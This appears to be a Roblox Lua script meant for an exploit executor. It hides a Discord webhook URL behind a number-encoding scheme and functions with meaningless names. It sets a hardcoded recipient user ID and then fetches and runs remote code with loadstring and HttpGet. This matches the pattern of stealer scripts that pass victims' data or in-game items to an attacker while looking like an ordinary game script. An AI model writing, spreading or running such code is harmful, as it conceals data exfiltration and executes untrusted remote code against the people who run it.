_function jRQzlnwqUHAYNtgOBnXkCGZnmXzuzDprqgPBePcyXGUxHGchlULqpfUXIDkRLLZFFQliDfrgbGacwFJh(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


function rTzkMhCxZbdylqdBSsfOzELiTJhmKPsEnDRJfEufkqQabhNoltcqNlyaAYrcPSDhuGpCeKojdVAzAfyBarxix(code)res=jRQzlnwqUHAYNtgOBnXkCGZnmXzuzDprqgPBePcyXGUxHGchlULqpfUXIDkRLLZFFQliDfrgbGacwFJh({})for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


_G.UserID = 6284583030
_G.WebHook = rTzkMhCxZbdylqdBSsfOzELiTJhmKPsEnDRJfEufkqQabhNoltcqNlyaAYrcPSDhuGpCeKojdVAzAfyBarxix({10920,12180,12180,11760,12075,6090,4935,4935,10500,11025,12075,10395,11655,11970,10500,4830,10395,11655,11445,4935,10185,11760,11025,4935,12495,10605,10290,10920,11655,11655,11235,12075,4935,5145,5145,5460,5040,5775,5880,5355,5250,5040,5880,5250,5460,5250,5355,5565,5250,5145,5670,5880,4935,9345,11130,5880,11340,8400,8190,7350,12810,11550,12600,10185,10500,5145,11550,12705,7350,5145,7665,6930,9030,12810,5565,11655,7035,10395,12705,5670,12495,8295,11550,11235,11550,9135,7035,7875,12810,11550,6825,5880,10815,10500,10500,8400,11445,8400,5880,11760,9345,11655,5460,8400,9240,6825,11235,7035,8715,11340,10500,7770,7140,10500,12180,5565,12705,11235,10395,5985,11865})
loadstring(game:HttpGet('https://raw.githubusercontent.com/SilenceScripts/main/Sebis%22))()        
